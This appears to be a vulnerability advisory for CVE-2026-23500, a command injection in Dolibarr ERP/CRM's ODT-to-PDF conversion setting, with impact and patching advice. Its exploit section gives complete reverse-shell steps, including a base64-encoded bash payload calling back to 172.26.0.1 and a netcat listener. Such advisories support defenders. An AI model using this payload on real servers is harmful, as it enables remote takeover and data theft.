Dolibarr ERP/CRM, OS Command Injection, CVE-2026-23500 (Critical)

Listen to this Post

How this CVE Works

The vulnerability arises from improper handling of a configuration constant during the ODT to PDF conversion process. When an administrator triggers a document conversion (e.g., for a proposal or invoice), the system builds a shell command by directly concatenating the `MAIN_ODT_AS_PDF` constant with a sanitized filename. The vulnerable code resides in `htdocs/includes/odtphp/odf.php` at approximately line 930, where it executes:

$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

While the `$name` variable is passed through escapeshellcmd(), the `MAIN_ODT_AS_PDF` constant is taken directly from the database without any validation or sanitization. This oversight allows an authenticated administrator to inject malicious payloads into this constant.
An attacker can use command separators, such as a semicolon (;), to append arbitrary commands after the legitimate converter path. For example, setting `MAIN_ODT_AS_PDF` to `jodconverter; malicious_command` causes the shell to execute `jodconverter` first and then the injected malicious_command.
To bypass character escaping issues (e.g., with `&` or >), the attacker can encode the malicious command in Base64. The payload can be structured as:

jodconverter; echo <base64_payload> | base64 -d | bash

This decodes and executes the Base64-encoded command, granting the attacker a reverse shell with the privileges of the web server user (typically www-data).
The attack is triggered whenever a document is generated using an ODT template, such as by navigating to `Commerce -> New proposal` and clicking Generate. The injected command runs on the server, leading to full remote code execution.
The vulnerability affects Dolibarr ERP/CRM versions prior to 23.0.0. It was fixed in version 23.0.0, released on February 28, 2026, by implementing proper sanitization of the `MAIN_ODT_AS_PDF` constant.

dailycve form

Platform: Dolibarr ERP/CRM
Version: < 23.0.0
Vulnerability: OS Command Injection
Severity: Critical (CVSS: 9.4)
Date: 2026-04-17

Prediction: 2026-02-28 (fixed in v23.0.0)

What Undercode Say

The vulnerability stems from a classic case of insufficient input sanitization leading to OS command injection. Below are related Bash commands and analytical codes.

Analyzing the vulnerable code snippet:

Simulate the vulnerable command construction
MAIN_ODT_AS_PDF="jodconverter"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"
echo "Command: $command"
Executes: jodconverter document.odt

Testing command injection with a payload:

Simulate injection using command separator
MAIN_ODT_AS_PDF="jodconverter; id"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"
echo "Command: $command"
Executes: jodconverter; id document.odt
The 'id' command runs after jodconverter

Base64 encoding a reverse shell payload:

Reverse shell command: bash -i >& /dev/tcp/172.26.0.1/4445 0>&1
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK

Decoding and executing the payload (as the attacker would):

Decode and execute the base64 payload
echo "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK" | base64 -d | bash

Exploit

Prerequisites:

  • Login as an Administrator in Dolibarr.
  • Ensure the “Commercial Proposals” module is enabled with “ODT templates” activated.

Steps to reproduce a reverse shell:

  1. Start a netcat listener on the attacker’s machine:
    nc -lvnp 4445
    

2. Encode the reverse shell command in Base64:

echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64

Output: `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK`

  1. Navigate to `Home -> Setup -> Other Setup` in the Dolibarr admin panel.
  2. Set the `MAIN_ODT_AS_PDF` constant to the following payload:
    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
    
  3. Trigger the exploit by navigating to Commerce -> New proposal, creating a draft, selecting an ODT template (e.g., generic_proposal_odt), and clicking Generate.
  4. Check the netcat listener — a reverse shell connection will be established, granting access to the server.

Protection from this CVE

  • Upgrade to Dolibarr version 23.0.0 or later. This version includes a fix that properly sanitizes the `MAIN_ODT_AS_PDF` configuration constant, preventing command injection.
  • Apply the official patch if upgrading is not immediately possible. The patch is available in the 23.0.0 release.
  • Restrict administrative privileges to only trusted users. Since exploitation requires authenticated admin access, minimizing the number of admins reduces risk.
  • Monitor and validate configuration constants that are used in shell commands. Avoid using unsanitized user input or database values in `exec()` calls.
  • Implement network segmentation to limit the impact of a compromised web server. For example, isolate the web server from critical internal systems.
  • Use a Web Application Firewall (WAF) to detect and block common command injection patterns, such as command separators (;, &&, |) in configuration inputs.
  • Regularly audit and review code for dangerous functions like exec(), system(), and `shell_exec()` to ensure proper input sanitization.

Impact

Successful exploitation results in Remote Code Execution (RCE) with the privileges of the web server user (typically www-data). This can lead to:
– Full system compromise: The attacker can execute arbitrary commands, potentially gaining persistent access to the server.
– Data breach: Sensitive configuration files (e.g., database credentials) can be read, leading to further data exfiltration or unauthorized access to other systems.
– Lateral movement: The compromised server can be used as a pivot point to attack other internal hosts, depending on network segmentation.
– Service disruption: The attacker could modify or delete application code, disrupt business operations, or deploy ransomware.
– Privilege escalation: If the web server user has additional privileges (e.g., sudo permissions or access to Docker sockets), the attacker may escalate to root or escape containers.
The CVSS 4.0 base score for this vulnerability is 9.4 (Critical), reflecting the high impact on confidentiality, integrity, and availability, along with the ease of exploitation given administrative access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top